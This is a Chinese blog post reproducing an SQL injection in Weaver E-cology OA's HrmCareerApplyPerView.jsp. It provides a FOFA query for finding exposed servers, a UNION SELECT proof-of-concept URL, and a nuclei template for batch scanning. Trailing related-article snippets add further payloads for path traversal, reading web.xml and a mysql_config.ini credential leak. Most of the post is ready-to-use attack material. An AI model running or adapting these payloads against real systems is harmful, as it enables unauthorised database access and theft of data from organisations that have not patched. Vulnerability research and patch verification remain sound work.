首页 > 数据库 >泛微E-cology HrmCareerApplyPerView.jspSQL注入漏洞

泛微E-cology HrmCareerApplyPerView.jspSQL注入漏洞

时间:2023-09-04 15:59:08浏览次数:41  
标签:27 E6% 漏洞 jspSQL jsp cology 泛微 HrmCareerApplyPerView

漏洞简介

泛微OA E-Cology HrmCareerApplyPerView.jsp 文件存在SQL注入漏洞,攻击者通过漏洞可以获取服务器数据库敏感文件

影响版本

泛微OA E-Cology v8.0

漏洞复现

fofa语法:app="泛微-协同办公OA"
登录页面如下:

POC
/pweb/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27abc%27)),db_name(1),5,6,7

nuclei批量yaml文件

id: ecology-HrmCareerApplyPerView-sqli
info:
  name: ecology-HrmCareerApplyPerView.jsp-sqli
  author: mhb17
  severity: high
  description: description
  reference:
    - https://peiqi.wgpsec.org/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Cology%20HrmCareerApplyPerView.jsp%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html
  tags: tags
requests:
  - raw:
      - |+
        GET /pweb/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27abc%27)),db_name(1),5,6,7 HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36
        Connection: close
        Accept: */*
        Accept-Language: en
        Accept-Encoding: gzip, deflate

    matchers-condition: and
    matchers:
      - type: binary
        part: body
        binary:
          - 2020202020203c74723e0d0a0920202020202020203c544420636c6173733d46
      - type: word
        part: header
        words:
          - '200'

标签:27,E6%,漏洞,jspSQL,jsp,cology,泛微,HrmCareerApplyPerView
From: https://www.cnblogs.com/pursue-security/p/17677268.html

相关文章

  • 泛微E-cology LoginSSO.jsp SQL注入漏洞 CNVD-2021-33202
    漏洞简介泛微e-cology是专为大中型企业制作的OA办公系统,支持PC端、移动端和微信端同时办公等。泛微e-cology存在SQL注入漏洞。攻击者可利用该漏洞获取敏感信息。漏洞影响泛微e-cology8.0漏洞复现fofa语法:app="泛微-协同办公OA"登录页面如下:POC:/upgrade/detail.jsp/log......
  • 泛微E-cology filedownload目录遍历漏洞
    漏洞描述泛微E-cologyfiledownload文件存在目录遍历漏洞漏洞复现fofa查询语法:app="泛微-协同办公OA"鹰图查询语法:app.name="泛微e-cology9.0OA"登录页面如下:POC:/weaver/ln.FileDownload?fpath=../ecology/WEB-INF/web.xmlnuclei批量yaml文件id:ecology-filedownloa......
  • 泛微E-cology FileDownloadForOutDoc SQL注入漏洞(CVE-2023-15672)
    漏洞简介泛微e-cology未对用户的输入进行有效的过滤,直接将其拼接进了SQL查询语句中,导致系统出现SQL注入漏洞。远程未授权攻击者可利用此漏洞获取敏感信息,进一步利用可能获取目标系统权限等。影响版本Ecology9.x补丁版本<10.58.0;Ecology8.x补丁版本<10.58.0漏洞复现fo......
  • 泛微E-cology ifNewsCheckOutByCurrentUser.dwr SQL注入漏洞
    漏洞描述泛微E-cology的ifNewsCheckOutByCurrentUser.dwr文件存在SQL注入漏洞。漏洞复现fofa语法:app="泛微-协同办公OA"登录页面如下:POC:POST/dwr/call/plaincall/CptDwrUtil.ifNewsCheckOutByCurrentUser.dwrHTTP/1.1Host:User-Agent:Mozilla/5.0(WindowsNT5.1)A......
  • 泛微E-Office UserSelect未授权访问漏洞
    漏洞描述泛微OAE-OfficeUserSelect接口存在未授权访问漏洞,通过漏洞攻击者可以获取敏感信息漏洞复现fofa语法:app="泛微-EOffice"登录页面如下:POC:/UserSelect/nuclei批量yaml文件id:EOffice_UserSelect_unauthinfo:name:泛微OAE-OfficeUserSelect未授权访问漏洞......
  • 泛微E-Office mysql_config.ini 数据库信息泄漏漏洞
    漏洞描述泛微E-Officemysql_config.ini文件可直接访问,泄漏数据库账号密码等信息漏洞复现fofa语法:app="泛微-EOffice"登录页面如下:验证POC:/mysql_config.ininuclei批量yaml文件id:EOffice_mysql_config_information_leakinfo:name:泛微OAE-Officemysql_config.i......
  • 泛微E-Mobile 6.0 命令执行漏洞
    漏洞描述泛微E-Mobile6.0存在命令执行漏洞(注:影响版本不确定,如下图6.6版本的也成功了)版本信息:E-Mobile6.0漏洞复现fofa语法:fofa:app="泛微-EMobile"hunter:app.name="泛微e-mobileOA"登录页面如下:POC:POST/client.doHTTP/1.1Host:Content-Type:multipart/form-dat......
  • 泛微OA清理人员抄送待办
    创建查询,链接ecology数据库,解决人员ID为6的抄送数据--1。备份wf_curr0724bak自定义select*intowf_curr0724bakfromworkflow_currentoperator--2查询替换useridselect*fromworkflow_currentoperatorawhereisremarkin(8,9)andisremarkin(8,9)andisL......
  • 泛微ecology FileDownloadForOutDoc-前台sql注入
    厂商发布漏洞补丁Ecology_security_20230707_v9.0_v10.58.0.ziphttps://www.weaver.com.cn/cs/package/Ecology_security_20230707_v9.0_v10.58.0.zip?v=2023070700分析补丁文件ecology\WEB-INF\myclasses\weaver\security\rules\ruleImp\SecurityRuleForOutDocForSql.class......
  • 泛微OA节点后附加操作-update数据
    1.礼品领用申请流程,到人力资源部备案节点,由人力资源部填写“实际使用数量”,在该节点后减少对应礼品的库存数量。2.节点后附加操作2.1新建DML接口动作2.2填写信息3.DML语句updateuf_jczlsetkcsl=kcsl-'{?d.sjsl}'whereid='{?d.lpmc}'......